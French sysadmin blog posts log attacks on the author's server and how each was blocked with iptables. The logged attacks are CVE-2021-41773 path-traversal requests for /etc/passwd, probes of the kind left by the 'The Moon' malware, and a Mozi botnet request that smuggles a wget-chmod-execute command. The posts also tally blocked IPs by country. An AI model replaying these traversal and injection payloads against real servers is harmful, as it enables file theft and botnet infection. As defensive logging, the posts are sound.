Faille de sécurité sur Apache « /cgi-bin/.%2e » (CVE-2021-41773)

J’ai pu observer deux attaques différentes :

167.71.13.196 - - [15/Oct/2021:01:11:24 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 5636 "-" "Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)"
45.93.201.33 - - [15/Oct/2021:08:16:57 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 485 "-" "-"

J’ai donc bloqué les ip :

# iptables -A INPUT -s 167.71.13.196 -j DROP
# iptables -A INPUT -s 45.93.201.33 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Pour information les IP en question :

IP Address Country Region City
167.71.13.196 Netherlands Noord-Holland Amsterdam
ISP Organization Latitude Longitude
DigitalOcean LLC Not Available 52.3740 4.8897
IP Address Country Region City
45.93.201.33 Russian Federation Moskva Moscow
ISP Organization Latitude Longitude
LIR LLC Not Available 55.7522 37.6156

A suivre.

Quels sont les pays des IP de mon fichier /etc/iptables/rules.v4 ?

J’ai fait un update de mon précédent article : https://www.cyber-neurones.org/2021/06/quels-sont-les-pays-des-ip-de-mon-fichier-etc-iptables-rules-v4/ .

Voici la commande et le résultat :

#  cat /etc/iptables/rules.v4 | grep "DROP" | awk '{print $4}' | sed 's/\// /g' | awk '{print $1}' | xargs -n 1 geoiplookup { } | sort | uniq -c | sort -n | sed -r 's/ GeoIP Country Edition://g'
      1 AL, Albania
      1 AT, Austria
      1 CZ, Czech Republic
      1 GR, Greece
      1 IE, Ireland
      1 MD, Moldova, Republic of
      1 PE, Peru
      1 PH, Philippines
      1 SE, Sweden
      1 TT, Trinidad and Tobago
      1 UG, Uganda
      2 ID, Indonesia
      2 IR, Iran, Islamic Republic of
      2 IT, Italy
      2 JP, Japan
      2 MX, Mexico
      2 MY, Malaysia
      2 SG, Singapore
      2 TR, Turkey
      2 TW, Taiwan
      3 VN, Vietnam
      4 BR, Brazil
      4 EG, Egypt
      4 SC, Seychelles
      5 DE, Germany
      5 FR, France
      5 GB, United Kingdom
      6 CA, Canada
      6 KR, Korea, Republic of
      7 NL, Netherlands
      7 RU, Russian Federation
     11 IN, India
     19 IP Address not found
     43 CN, China
    107 US, United States

Toujours US devant avec 107 IPs … finalement les Russes avec 7 IPs sont petits joueurs.

Misère.

 

Faille securité : malware surnommé « THE MOON » sur Linksys.

Voici un exemple de trace sur mon serveur :

50.31.21.6 - - [14/Oct/2021:02:02:15 +0200] "GET / HTTP/1.0" 302 5156 "-" "-"
50.31.21.6 - - [14/Oct/2021:02:02:48 +0200] "HEAD / HTTP/1.1" 302 4938 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:48 +0200] "GET /nmaplowercheck1634169768 HTTP/1.1" 302 5145 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:48 +0200] "POST /sdk HTTP/1.1" 302 4957 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:48 +0200] "GET / HTTP/1.0" 302 5156 "-" "-"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "GET /HNAP1 HTTP/1.1" 302 5145 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "GET / HTTP/1.1" 302 5126 "-" "-"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "HEAD /user/auth/login HTTP/1.1" 200 6095 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "GET /evox/about HTTP/1.1" 302 5145 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"
50.31.21.6 - - [14/Oct/2021:02:02:49 +0200] "GET /user/auth/login HTTP/1.1" 200 29756 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MDDCJS; rv:11.0) like Gecko"

La signature c’est surtout : « GET /HNAP1 HTTP/1.1 »

Mon action :

# iptables -A INPUT -s 50.31.21.6 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Plus d’information sur l’IP :

IP Address Country Region City
50.31.21.6 United States of America Illinois Chicago
ISP Organization Latitude Longitude
SteadFast Not Available 41.8761 -87.6521

A noter que c’est visiblement pas la première attaque du type :

134.255.233.173 - - [13/Oct/2021:18:55:13 +0200] "POST /HNAP1/ HTTP/1.1" 302 255 "-" "Mozila/5.0"
192.168.1.153 - - [13/Oct/2021:21:25:40 +0200] "GET /HNAP1/ HTTP/1.1" 302 404 "-" "Avast Antivirus"
112.27.124.140 - - [30/Oct/2020:22:40:00 +0100] "POST /HNAP1/ HTTP/1.0" 408 484 "-" "-"
45.6.195.248 - - [31/Oct/2020:00:23:21 +0100] "POST /HNAP1/ HTTP/1.0" 408 484 "-" "-"

Misère.

Faille de securité sur « wget » via http ?

J’ai pu voir dans mes logs :

125.43.243.4 - - [14/Oct/2021:12:53:13 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 0 "-" "-"

J’ai donc filtré l’IP :

# iptables -A INPUT -s 125.43.243.4 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Misère.

IP Address Country Region City
125.43.243.4 China Henan Jiaozuo
ISP Organization Latitude Longitude
China Unicom Henan Province Network Not Available 35.2397 113.2331